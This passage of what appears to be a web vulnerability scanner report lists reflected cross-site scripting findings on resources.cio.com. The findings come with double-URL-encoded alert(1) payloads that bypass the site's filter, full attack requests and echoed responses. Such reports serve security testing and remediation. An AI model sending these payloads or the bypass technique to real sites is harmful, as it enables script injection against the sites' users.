Cookie: __utmz=2214449.1292508562.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/32; __utma=2214449.1299671062.1292508562.1292508562.1292508562.1; __utmc=2214449; __qca=P0-1520383801-1292508602935; __utmb=2214449.1.10.1292508562;

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 14:58:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=25774492;expires=Sat, 08-Dec-2040 14:58:18 GMT;path=/
Set-Cookie: CFTOKEN=7019de5724484f24-EFB05026-24E8-5498-9B81044F281F0899;expires=Sat, 08-Dec-2040 14:58:18 GMT;path=/
Set-Cookie: JSESSIONID=f2303c3e748b659240472d2ff1d35d685e13;path=/
Content-Language: en-GB
Content-Type: text/html; charset=UTF-8
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   
    <head>
       <t
...[SNIP]...
<!--http://www.pcadvisor.co.uk:80/styles/pcamac.cssde645-->16d9153269f-->
...[SNIP]...

2.273. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000223/00056590007964CIO58HH9JQ1JV/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a539%2522%253balert%25281%2529%252f%252f52016fcd1ec was submitted in the REST URL parameter 2. This input was echoed as 2a539";alert(1)//52016fcd1ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/2000002232a539%2522%253balert%25281%2529%252f%252f52016fcd1ec/00056590007964CIO58HH9JQ1JV/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "3d8cd694aec39073090d8d1eef866e28"
X-Runtime: 73
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 2988
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
           var reg_url = "http://reg.idgenterprise.com/reg/cio/form/2000002232a539";alert(1)//52016fcd1ec?SOURCE=00056590007964CIO58HH9JQ1JV&sHdr=1&codetype=g&pagename=pageName|UNKNOWN&pagetype=prop14|UNKNOWN" + "&elqguid=" + elqCustomerGUID;
           document.write('<iframe src="'+ reg_url +'" width="700" hei
...[SNIP]...

2.274. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000223/00056590007964CIO58HH9JQ1JV/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 154c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e349839c022 was submitted in the REST URL parameter 2. This input was echoed as 154c9"><script>alert(1)</script>349839c022 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/154c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e349839c022/00056590007964CIO58HH9JQ1JV/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "749373979229e256043f96ef56f46da7"
X-Runtime: 85
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3823
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<iframe src="http://www.accelacomm.com/jaw/00056590007964CIO58HH9JQ1JV/7/154c9"><script>alert(1)</script>349839c022/" width="700" height="1450" style="position:relative;left:0px;top:0px;" frameborder="no" border="0" marginheight="0" marginwidth="0" scrolling="no">
...[SNIP]...

2.275. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000223/00056590007964CIO58HH9JQ1JV/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d9e0%2522%253balert%25281%2529%252f%252f33197a93f3 was submitted in the REST URL parameter 3. This input was echoed as 8d9e0";alert(1)//33197a93f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/200000223/00056590007964CIO58HH9JQ1JV8d9e0%2522%253balert%25281%2529%252f%252f33197a93f3/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "cf8d8e2abea92c96886a75c679ef5fbc"
X-Runtime: 6
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3826
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
           var reg_url = "http://reg.idgenterprise.com/reg/cio/form/200000223?SOURCE=00056590007964CIO58HH9JQ1JV8d9e0";alert(1)//33197a93f3&sHdr=0&codetype=g&pagename=pageName|White Paper:LG:3374:The Art and Science of Knowing&pagetype=prop14|White Paper" + "&elqguid=" + elqCustomerGUID;
           document.write('<iframe src="'+ reg_url +'" wid
...[SNIP]...

2.276. http://resources.cio.com/show/200000223/00056590007964CIO58HH9JQ1JV/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000223/00056590007964CIO58HH9JQ1JV/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6193f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e55bb0344024 was submitted in the REST URL parameter 3. This input was echoed as 6193f"><script>alert(1)</script>55bb0344024 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/200000223/6193f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e55bb0344024/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "ffd0915e548f283e568c9e54e76d2eca"
X-Runtime: 5
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3804
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<iframe src="http://reg.idgenterprise.com/reg/cio/form/200000223?SOURCE=6193f"><script>alert(1)</script>55bb0344024&sHdr=0&codetype=g&pagename=pageName|White Paper:LG:3374:The Art and Science of Knowing&pagetype=prop14|White Paper" width="700" height="1450" style="position:relative;left:0px;top:0px;" frameborder="n
...[SNIP]...

2.277. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000224/00056590007963CIOS94WBH8V1I/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c0fa%2522%253balert%25281%2529%252f%252f51efbad8729 was submitted in the REST URL parameter 2. This input was echoed as 8c0fa";alert(1)//51efbad8729 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/2000002248c0fa%2522%253balert%25281%2529%252f%252f51efbad8729/00056590007963CIOS94WBH8V1I/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:31 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "37d6fceb4ae92fb4115985eb1dc4c317"
X-Runtime: 167
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 2988
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
           var reg_url = "http://reg.idgenterprise.com/reg/cio/form/2000002248c0fa";alert(1)//51efbad8729?SOURCE=00056590007963CIOS94WBH8V1I&sHdr=1&codetype=g&pagename=pageName|UNKNOWN&pagetype=prop14|UNKNOWN" + "&elqguid=" + elqCustomerGUID;
           document.write('<iframe src="'+ reg_url +'" width="700" hei
...[SNIP]...

2.278. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000224/00056590007963CIOS94WBH8V1I/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0217%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e694a86a3811 was submitted in the REST URL parameter 2. This input was echoed as e0217"><script>alert(1)</script>694a86a3811 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/e0217%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e694a86a3811/00056590007963CIOS94WBH8V1I/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "a01a1d212e0fb67cce0e6b48d8cf3d2f"
X-Runtime: 55
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3825
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<iframe src="http://www.accelacomm.com/jaw/00056590007963CIOS94WBH8V1I/7/e0217"><script>alert(1)</script>694a86a3811/" width="700" height="1450" style="position:relative;left:0px;top:0px;" frameborder="no" border="0" marginheight="0" marginwidth="0" scrolling="no">
...[SNIP]...

2.279. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000224/00056590007963CIOS94WBH8V1I/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf280%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edb3887e864 was submitted in the REST URL parameter 3. This input was echoed as bf280"><script>alert(1)</script>db3887e864 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/200000224/bf280%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edb3887e864/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:39 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "3077ba43156c4772e0306c6173b28528"
X-Runtime: 6
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3775
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<iframe src="http://reg.idgenterprise.com/reg/cio/form/200000224?SOURCE=bf280"><script>alert(1)</script>db3887e864&sHdr=0&codetype=g&pagename=pageName|White Paper:LG:3367:Information is King&pagetype=prop14|White Paper" width="700" height="1450" style="position:relative;left:0px;top:0px;" frameborder="no" border="
...[SNIP]...

2.280. http://resources.cio.com/show/200000224/00056590007963CIOS94WBH8V1I/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000224/00056590007963CIOS94WBH8V1I/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75f50%2522%253balert%25281%2529%252f%252f8667a0fba70 was submitted in the REST URL parameter 3. This input was echoed as 75f50";alert(1)//8667a0fba70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/200000224/00056590007963CIOS94WBH8V1I75f50%2522%253balert%25281%2529%252f%252f8667a0fba70/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "2195a2d60c55b8bfd2c219b1adf42a9b"
X-Runtime: 5
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3801
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
           var reg_url = "http://reg.idgenterprise.com/reg/cio/form/200000224?SOURCE=00056590007963CIOS94WBH8V1I75f50";alert(1)//8667a0fba70&sHdr=0&codetype=g&pagename=pageName|White Paper:LG:3367:Information is King&pagetype=prop14|White Paper" + "&elqguid=" + elqCustomerGUID;
           document.write('<iframe src="'+ reg_url +'" width="700" he
...[SNIP]...

2.281. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000225/00056590007961CIOFJENR82NVR/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 805c7%2522%253balert%25281%2529%252f%252fe2b49d6cd85 was submitted in the REST URL parameter 2. This input was echoed as 805c7";alert(1)//e2b49d6cd85 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/200000225805c7%2522%253balert%25281%2529%252f%252fe2b49d6cd85/00056590007961CIOFJENR82NVR/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "22f79820d43683cc40ee4b60809ff3b2"
X-Runtime: 73
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 2988
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
           var reg_url = "http://reg.idgenterprise.com/reg/cio/form/200000225805c7";alert(1)//e2b49d6cd85?SOURCE=00056590007961CIOFJENR82NVR&sHdr=1&codetype=g&pagename=pageName|UNKNOWN&pagetype=prop14|UNKNOWN" + "&elqguid=" + elqCustomerGUID;
           document.write('<iframe src="'+ reg_url +'" width="700" hei
...[SNIP]...

2.282. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000225/00056590007961CIOFJENR82NVR/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c0ae%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea11ddcb6f84 was submitted in the REST URL parameter 2. This input was echoed as 3c0ae"><script>alert(1)</script>a11ddcb6f84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/3c0ae%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea11ddcb6f84/00056590007961CIOFJENR82NVR/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "48369e0518d2868e024b5076ba1fb82b"
X-Runtime: 84
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3825
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<iframe src="http://www.accelacomm.com/jaw/00056590007961CIOFJENR82NVR/7/3c0ae"><script>alert(1)</script>a11ddcb6f84/" width="700" height="1450" style="position:relative;left:0px;top:0px;" frameborder="no" border="0" marginheight="0" marginwidth="0" scrolling="no">
...[SNIP]...

2.283. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000225/00056590007961CIOFJENR82NVR/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 540a7%2522%253balert%25281%2529%252f%252f5289850d27 was submitted in the REST URL parameter 3. This input was echoed as 540a7";alert(1)//5289850d27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/200000225/00056590007961CIOFJENR82NVR540a7%2522%253balert%25281%2529%252f%252f5289850d27/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "8ee8f4eccf98429d6ef16af2113a4b33"
X-Runtime: 6
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3865
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<script type="text/javascript">
           var reg_url = "http://reg.idgenterprise.com/reg/cio/form/200000225?SOURCE=00056590007961CIOFJENR82NVR540a7";alert(1)//5289850d27&sHdr=0&codetype=g&pagename=pageName|White Paper:LG:3365:8 Essentials of Business Analytics&pagetype=prop14|White Paper" + "&elqguid=" + elqCustomerGUID;
           document.write('<iframe src="'+ reg_url +'"
...[SNIP]...

2.284. http://resources.cio.com/show/200000225/00056590007961CIOFJENR82NVR/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
Path:   /show/200000225/00056590007961CIOFJENR82NVR/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4451d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8452a81c58e was submitted in the REST URL parameter 3. This input was echoed as 4451d"><script>alert(1)</script>8452a81c58e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /show/200000225/4451d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8452a81c58e/ HTTP/1.1
Host: resources.cio.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:14:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.5
ETag: "a7b482d31e740d1760552dd82bf0d16c"
X-Runtime: 7
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3843
Status: 200
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
<iframe src="http://reg.idgenterprise.com/reg/cio/form/200000225?SOURCE=4451d"><script>alert(1)</script>8452a81c58e&sHdr=0&codetype=g&pagename=pageName|White Paper:LG:3365:8 Essentials of Business Analytics&pagetype=prop14|White Paper" width="700" height="1450" style="position:relative;left:0px;top:0px;" frameborde
...[SNIP]...

2.285. http://resources.cio.com/show/51117387/00026040004262CIOJFKVLDIMHW/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://resources.cio.com
